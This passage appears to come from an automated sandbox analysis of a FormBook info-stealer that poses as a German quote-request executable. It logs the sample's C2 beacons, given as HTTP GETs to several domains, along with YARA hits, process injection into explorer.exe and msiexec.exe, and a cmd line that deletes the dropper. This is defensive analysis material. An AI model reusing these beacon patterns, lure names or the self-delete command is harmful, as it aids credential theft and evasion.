20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'IONOSParkingUS'


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.349777198.54.117.21280C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 9, 2022 09:13:07.740291119 CEST1823OUTGET /g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0r HTTP/1.1
                                                                            Host: www.terrierslovjt.xyz
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.349787185.111.89.17580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 9, 2022 09:13:18.080081940 CEST7721OUTGET /g6k0/?oT=6RYluMxNX3+UBUvEGFzo52kesULJ7OMzMGVALFRE7BcQ/7Cn+C5GWBVLLjru1ffm4ceC&vDKd7h=9rjLcdHx-0r HTTP/1.1
                                                                            Host: www.10thring.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 9, 2022 09:13:18.623420000 CEST7722INHTTP/1.1 301 Moved Permanently
                                                                            Date: Sat, 09 Apr 2022 07:13:18 GMT
                                                                            Server: Apache
                                                                            X-Redirect-By: WordPress
                                                                            Upgrade: h2,h2c
                                                                            Connection: keep-alive, close
                                                                            Location: https://10thring.com/g6k0/?oT=6RYluMxNX3+UBUvEGFzo52kesULJ7OMzMGVALFRE7BcQ/7Cn+C5GWBVLLjru1ffm4ceC&vDKd7h=9rjLcdHx-0r
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            Content-Length: 0
                                                                            Content-Type: text/html; charset=UTF-8


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.349789104.19.178.12180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 9, 2022 09:13:28.877144098 CEST8232OUTGET /g6k0/?oT=YhpnqMeKeHQV9hpawJJ8kDg8ped7Wcc3vUTi9AzVcbGOoRzcVA1Xx6BKuahE3Ao/4185&vDKd7h=9rjLcdHx-0r HTTP/1.1
                                                                            Host: www.youcanstores.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 9, 2022 09:13:28.903852940 CEST8233INHTTP/1.1 409 Conflict
                                                                            Date: Sat, 09 Apr 2022 07:13:28 GMT
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Content-Length: 16
                                                                            Connection: close
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Referrer-Policy: same-origin
                                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Server: cloudflare
                                                                            CF-RAY: 6f9170bb8aad9b82-FRA
                                                                            Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                                            Data Ascii: error code: 1001


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.349791185.76.64.17380C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 9, 2022 09:13:39.103868008 CEST8242OUTGET /g6k0/?oT=1yOpS97qTPJuX4vdeJnQ3O9XBc/xzRMbKQW/nvdMbZZlwvnrgiUHRDWYI6wAZPcgG2JU&vDKd7h=9rjLcdHx-0r HTTP/1.1
                                                                            Host: www.williamhag.online
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 9, 2022 09:13:39.151034117 CEST8243INHTTP/1.1 403 Forbidden
                                                                            Content-Type: text/html
                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: 0
                                                                            Server: BitNinja Captcha Server
                                                                            Date: Sat, 09 Apr 2022 07:13:40 GMT
                                                                            Content-Length: 13724
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20
                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}


                                                                            Target ID:0
                                                                            Start time:09:11:35
                                                                            Start date:09/04/2022
                                                                            Path:C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:612864 bytes
                                                                            MD5 hash:1C9B3C703779B11B16DE35B52E2FD3D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.274786990.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Target ID:2
                                                                            Start time:09:11:42
                                                                            Start date:09/04/2022
                                                                            Path:C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
                                                                            Imagebase:0x710000
                                                                            File size:612864 bytes
                                                                            MD5 hash:1C9B3C703779B11B16DE35B52E2FD3D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Target ID:3
                                                                            Start time:09:11:45
                                                                            Start date:09/04/2022
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                            Imagebase:0x7ff6b8cf0000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Target ID:13
                                                                            Start time:09:12:14
                                                                            Start date:09/04/2022
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                            Imagebase:0x11f0000
                                                                            File size:59904 bytes
                                                                            MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            Target ID:14
                                                                            Start time:09:12:18
                                                                            Start date:09/04/2022
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
                                                                            Imagebase:0xc20000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Target ID:16
                                                                            Start time:09:12:19
                                                                            Start date:09/04/2022
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7c9170000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            No disassembly